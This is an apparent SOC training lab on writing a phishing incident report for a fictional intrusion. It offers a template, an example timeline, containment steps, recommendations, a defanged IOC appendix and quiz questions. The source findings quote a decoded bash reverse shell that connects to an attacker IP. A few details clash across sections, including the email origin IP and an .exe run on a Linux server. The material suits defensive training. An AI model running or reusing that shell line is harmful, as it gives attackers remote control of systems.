What You'll Learn
- Structure a formal phishing incident report using industry-standard sections and formatting
- Write an executive summary that communicates impact and urgency to non-technical stakeholders
- Compile a complete incident timeline from investigation findings across multiple data sources
- Produce a blocklist-ready IOC appendix with proper defanging and categorization
- Document containment actions, lessons learned, and recommended security improvements
Lab Overview
| Detail | Value |
|---|---|
| Lab Type | Browser-Only |
| Tools Required | Browser |
| Estimated Time | 50–60 minutes |
| Difficulty | Intermediate |
| Pre-Requisites | Labs PH.1–PH.5 (findings used as report source material) |
| Deliverable | Complete phishing incident report (2,000–3,000 words) using the provided template |
Reports Are How Analysts Create Impact. You can be the best investigator in the world, but if you can't document your findings clearly, your work disappears. Incident reports are read by executives (who control budgets), legal teams (who assess liability), IT teams (who implement fixes), and auditors (who verify compliance). A well-written report turns a security incident into organizational improvement.
The Scenario
You've completed your phishing investigation across Labs PH.1–PH.5. You analyzed email headers, verified authentication records, classified phishing types, extracted IOCs, and investigated the incident in Wazuh. Now your CISO has asked for a formal incident report to present to the executive team and share with the legal department.
Your report must be understandable by non-technical executives while containing enough technical detail for the security and IT teams to act on.
The Incident Summary (Source Material)
Use these consolidated findings from the previous labs as your source material. If you completed Labs PH.1–PH.5, substitute your actual findings where applicable.
INCIDENT REFERENCE DATA
═══════════════════════
Incident ID: PHISH-2026-0217-001
Date Detected: February 17, 2026, 09:14 UTC
Date Reported: February 17, 2026, 09:47 UTC
Reported By: Michael Johnson (Finance Department)
Initial Vector: Phishing email with malicious link
Classification: Phishing → Malware Delivery → Lateral Movement
Affected Systems:
- linux-web-01 (reverse shell, privilege escalation)
- WIN-SERVER-01 (brute force, new service installation)
- dns-server-01 (C2 DNS queries observed)
- fw-edge-01 (blocked outbound C2 traffic)
Affected Accounts:
- www-data (linux-web-01, compromised via web app → sudo escalation)
- Administrator (WIN-SERVER-01, brute forced after lateral movement)
Attacker Infrastructure:
- 185.220.101.42 (SSH brute force source, C2 callback)
- 91.234.99.87 (Windows brute force source)
- globaltrade-payments.com (phishing sender domain)
- secure-docs-portal.com (phishing link)
- cdn-storage-8847.com (payload hosting)
- c2-beacon.malware-infra.net (C2 domain)
Malware:
- invoice_GT2026.exe (SHA256: e3b0c44298fc1c149afb...)
- Base64-encoded bash reverse shell (decoded: bash -i >& /dev/tcp/185.220.101.42/4445 0>&1)
Part 1: Report Template
Use the following template structure. Each section has guidance on what to include and how to write it.
Section 1: Report Header
╔═══════════════════════════════════════════════════════════════╗
║ PHISHING INCIDENT REPORT ║
║ CONFIDENTIAL — INTERNAL USE ONLY ║
╠═══════════════════════════════════════════════════════════════╣
║ Incident ID: PHISH-2026-0217-001 ║
║ Report Date: [Today's Date] ║
║ Report Author: [Your Name], SOC Analyst ║
║ Classification: CONFIDENTIAL ║
║ Distribution: CISO, Legal, IT Operations, HR ║
║ Report Version: 1.0 ║
╚═══════════════════════════════════════════════════════════════╝
Section 2: Executive Summary
Write 3-5 sentences covering:
- What happened (one sentence)
- How it was detected (one sentence)
- What was the impact (one sentence)
- What was done about it (one sentence)
- Current status (one sentence)
Writing for Executives. The executive summary is the most important section — many readers will stop here. Use business language, not technical jargon. Instead of "A base64-encoded reverse shell was executed via bash piped through /dev/tcp," write "The attacker gained remote control of our web server through a disguised command hidden in the phishing payload." Accuracy matters, but accessibility matters more.
Example Executive Summary:
EXECUTIVE SUMMARY
═════════════════
On February 17, 2026, a phishing email impersonating a vendor invoice
was delivered to a Finance Department employee. The email contained a
link that downloaded malicious software disguised as a PDF invoice.
Upon execution, the malware established a connection to attacker
infrastructure, enabling unauthorized access to two internal servers.
The attacker escalated privileges on the web server and moved laterally
to a Windows server, where a persistent backdoor was installed. The
incident was detected within 33 minutes of the initial email delivery
through automated SIEM alerting. Containment actions were executed
within 2 hours, including blocking attacker IPs, isolating affected
systems, and resetting compromised credentials. No evidence of data
exfiltration was found. The incident is currently in the eradication
and recovery phase.
Part 2: Incident Details
Section 3: Detection & Initial Response
Document how the incident was discovered and what happened in the first hour:
DETECTION & INITIAL RESPONSE
═════════════════════════════
Detection Method: [User report / SIEM alert / Email gateway / Other]
Detection Time: [timestamp]
Initial Reporter: [name and department]
Triage Analyst: [your name]
Initial Actions:
1. [First action taken and timestamp]
2. [Second action]
3. [Third action]
Time to Detection: [minutes from delivery to detection]
Time to Containment: [minutes from detection to containment]
Section 4: Attack Timeline
Build a chronological timeline using findings from your previous labs:
ATTACK TIMELINE
═══════════════
Date/Time (UTC) Event Source
──────────────────── ───────────────────────────────────── ─────────────
2026-02-17 06:33:18 Phishing email sent to M. Johnson Email headers
2026-02-17 09:14:30 Email delivered to recipient mailbox Email gateway
2026-02-17 ~09:15 User clicks link, downloads payload [inferred]
2026-02-17 09:17:xx Reverse shell executed on linux-web-01 Wazuh rule 100002
2026-02-17 09:18:xx Recon: www-data runs 'id' via sudo Wazuh sudo alerts
2026-02-17 09:19:xx Credential theft: cat /etc/shadow Wazuh sudo alerts
2026-02-17 09:20:xx Full root shell obtained Wazuh sudo alerts
2026-02-17 09:25:xx Windows brute force begins Wazuh rule 18152
2026-02-17 09:32:xx Successful Windows logon Wazuh rule 60106
2026-02-17 09:35:xx New service installed (persistence) Wazuh rule 60108
2026-02-17 09:47:00 User reports suspicious email to SOC Email to phishing inbox
2026-02-17 10:15:00 Containment initiated SOC team
Section 5: Technical Analysis
Provide the technical deep-dive for the security team:
TECHNICAL ANALYSIS
══════════════════
Email Analysis:
- From header spoofed as billing@acme-corp.com
- Return-Path: bounce-handler@vps-mailer-node7.xyz (domain mismatch)
- SPF: FAIL | DKIM: NONE | DMARC: FAIL
- X-Mailer: PHPMailer 6.5.0
- Originating IP: 91.215.42.118
Phishing Link Chain:
hxxps://secure-docs-portal[.]com/invoice/GT-2026-8847.pdf
→ 302 redirect →
hxxps://cdn-storage-8847[.]com/dl/invoice_GT2026.exe
Malware Analysis:
File: invoice_GT2026.exe
SHA256: e3b0c44298fc1c149afb...
Behavior: Base64-decoded bash reverse shell
C2: 185.220.101.42:4445 (HTTPS callback)
Secondary DNS: c2-beacon.malware-infra[.]net
Lateral Movement:
Source: linux-web-01 (www-data → root via sudo)
Target: WIN-SERVER-01 (Administrator via brute force)
Persistence: New Windows service installed
Part 3: Impact & Response
Section 6: Impact Assessment
IMPACT ASSESSMENT
═════════════════
Category Impact Level Details
Confidentiality [H/M/L] [Were credentials/data exposed?]
Integrity [H/M/L] [Were systems/data modified?]
Availability [H/M/L] [Were services disrupted?]
Financial [H/M/L] [Estimated cost of response + downtime]
Regulatory [H/M/L] [Are there notification requirements?]
Reputational [H/M/L] [Was customer data involved?]
Systems Affected: 4 (2 compromised, 2 observed C2 traffic)
Accounts Compromised: 2 (www-data, Administrator)
Data Exfiltrated: None confirmed (but /etc/shadow was accessed)
Section 7: Containment & Eradication Actions
CONTAINMENT ACTIONS TAKEN
═════════════════════════
# Action Time Status Owner
1 Block 185.220.101.42 at perimeter firewall 10:15 UTC Complete Network Ops
2 Block 91.234.99.87 at perimeter firewall 10:15 UTC Complete Network Ops
3 Block C2 domains at DNS resolver 10:18 UTC Complete Network Ops
4 Isolate linux-web-01 from network 10:20 UTC Complete IT Ops
5 Isolate WIN-SERVER-01 from network 10:22 UTC Complete IT Ops
6 Reset Administrator password (Windows) 10:30 UTC Complete IT Ops
7 Disable www-data sudo access 10:35 UTC Complete IT Ops
8 Block sender domain at email gateway 10:40 UTC Complete Email Admin
9 Mailbox sweep for similar phishing emails 11:00 UTC Complete SOC
10 Endpoint scan for invoice_GT2026.exe 11:30 UTC Complete SOC
ERADICATION STEPS (In Progress)
- [ ] Remove reverse shell artifacts from linux-web-01
- [ ] Remove malicious Windows service from WIN-SERVER-01
- [ ] Rebuild compromised systems from clean images
- [ ] Rotate all credentials that may have been exposed
Part 4: Lessons & Recommendations
Section 8: Lessons Learned
Write 5 actionable lessons learned, structured as:
- What happened → Why it happened → How to prevent it
LESSONS LEARNED
═══════════════
1. PHISHING EMAIL BYPASSED EMAIL GATEWAY
What: Email with SPF fail, no DKIM, and DMARC fail was delivered
Why: Email gateway was not configured to enforce DMARC rejection
Fix: Enable DMARC enforcement (reject policy) on the email gateway
2. USER CLICKED MALICIOUS LINK
What: Finance employee clicked a phishing link without verification
Why: No phishing awareness training in the past 12 months
Fix: Implement quarterly phishing simulation + awareness training
3. MALWARE EXECUTED WITHOUT RESTRICTION
What: Downloaded .exe file was executed on a Linux web server
Why: No application whitelisting or execution prevention controls
Fix: Deploy application control policies (SELinux, AppArmor)
4. LATERAL MOVEMENT SUCCEEDED
What: Attacker moved from linux-web-01 to WIN-SERVER-01
Why: Flat network architecture with no segmentation between tiers
Fix: Implement network segmentation — web tier, app tier, data tier
5. SUDO ACCESS WAS OVERLY PERMISSIVE
What: www-data account executed arbitrary commands via sudo
Why: Sudoers configuration was too broad for the web service account
Fix: Restrict www-data sudoers to only specific required commands
Section 9: Recommendations
Write 5-7 prioritized recommendations:
RECOMMENDATIONS
═══════════════
Priority Recommendation Owner Timeline
CRITICAL Enforce DMARC rejection on email gateway Email Admin 1 week
CRITICAL Implement network segmentation (web/app/data) Network Ops 30 days
HIGH Deploy endpoint detection & response (EDR) Security 30 days
HIGH Restrict sudo access for service accounts IT Ops 1 week
MEDIUM Quarterly phishing awareness training HR/Security Ongoing
MEDIUM Implement application whitelisting on servers IT Ops 60 days
LOW Deploy email banner for external messages Email Admin 2 weeks
Part 5: IOC Appendix
Section 10: Indicators of Compromise
APPENDIX A: INDICATORS OF COMPROMISE
═════════════════════════════════════
All IOCs are defanged for safe handling in documentation.
TYPE IOC CONTEXT
Email invoicing@globaltrade-payments[.]com Phishing sender
Email bounce-handler@vps-mailer-node7[.]xyz Envelope sender
Domain globaltrade-payments[.]com Phishing from domain
Domain vps-mailer-node7[.]xyz Sending infrastructure
Domain secure-docs-portal[.]com Phishing link host
Domain cdn-storage-8847[.]com Payload host
Domain c2-beacon[.]malware-infra[.]net C2 domain
IP Address 185.220.101.42 Brute force + C2
IP Address 91.234.99.87 Windows brute force
IP Address 193.42.33.107 Email origination
URL hxxps://secure-docs-portal[.]com/invoice/GT-2026-8847[.]pdf Phishing link
URL hxxps://cdn-storage-8847[.]com/dl/invoice_GT2026[.]exe Payload URL
File Hash e3b0c44298fc1c149afbf4c8996fb924... (SHA256) Malware payload
File Hash d41d8cd98f00b204e9800998ecf8427e (MD5) Malware payload
File Name invoice_GT2026.exe Payload filename
Report Distribution. Incident reports contain sensitive information about your organization's vulnerabilities, attack surface, and security gaps. Always mark them CONFIDENTIAL, restrict distribution to named recipients, and never share IOC appendices publicly without removing organization-specific details. Use TLP (Traffic Light Protocol) markings when sharing with external parties.
Part 6: Finalize Your Report
Quality Checklist
Review your completed report against these criteria:
- Executive summary is readable by a non-technical executive in under 60 seconds
- Timeline is chronologically accurate with specific timestamps
- Technical analysis provides enough detail for the IT team to act
- Impact assessment covers all CIA triad dimensions plus business impact
- Containment actions are numbered, timestamped, and assigned to owners
- Lessons learned follow the What → Why → Fix structure
- Recommendations are prioritized with owners and timelines
- IOC appendix is defanged and categorized by type
- No sensitive data is exposed (credentials, internal IPs beyond scope)
- Report header includes classification, distribution list, and version
Deliverable Checklist
Before completing the lab, ensure you have:
- Complete Report — All 10 sections filled out using the template
- Executive Summary — 3-5 sentences, non-technical language
- Attack Timeline — At least 10 events in chronological order
- Impact Assessment — All 6 categories rated with justification
- Lessons Learned — 5 items with What/Why/Fix structure
- IOC Appendix — All indicators defanged and categorized
Key Takeaways
- The executive summary is the most-read section — write it for a non-technical audience using business language
- Timelines must be chronologically precise — they become the foundation for legal review and insurance claims
- Lessons learned should focus on systemic improvements, not blame — "training was absent" not "the user was careless"
- IOCs must be defanged in reports to prevent accidental clicks and auto-resolution by security tools
- Reports should be versioned and have controlled distribution — they contain sensitive vulnerability information
What's Next
Congratulations — you've completed the full phishing analysis module! You've progressed from analyzing individual email headers through authentication verification, threat classification, IOC extraction, SIEM-based investigation, and professional reporting. In Module 5, you'll apply these skills to a new domain: Threat Intelligence & IOC Management with MISP.
Lab Challenge: Write the Phishing Report
10 questions · 70% to pass
What is the primary audience for the Executive Summary section of an incident report?
Why should incident reports be marked CONFIDENTIAL with a controlled distribution list?
In the Lessons Learned section, which format most effectively drives organizational improvement?
The attack timeline shows 33 minutes between email delivery (09:14) and user report (09:47). How should this metric be presented in the report?
Why must IOCs be defanged (hxxps://, domain[.]com) in the report appendix?
The Impact Assessment rates 'Confidentiality' as HIGH because /etc/shadow was accessed. Why is this significant even if no data was exfiltrated?
In the Recommendations section, why is 'Enforce DMARC rejection on email gateway' rated CRITICAL priority?
When writing the Technical Analysis section, how should you describe the base64-encoded reverse shell for the IT team vs the executive summary?
The containment actions table includes timestamps and owners for each action. Why are these details important?
Your report is complete. What is the recommended next step before distributing it to stakeholders?
0/10 answered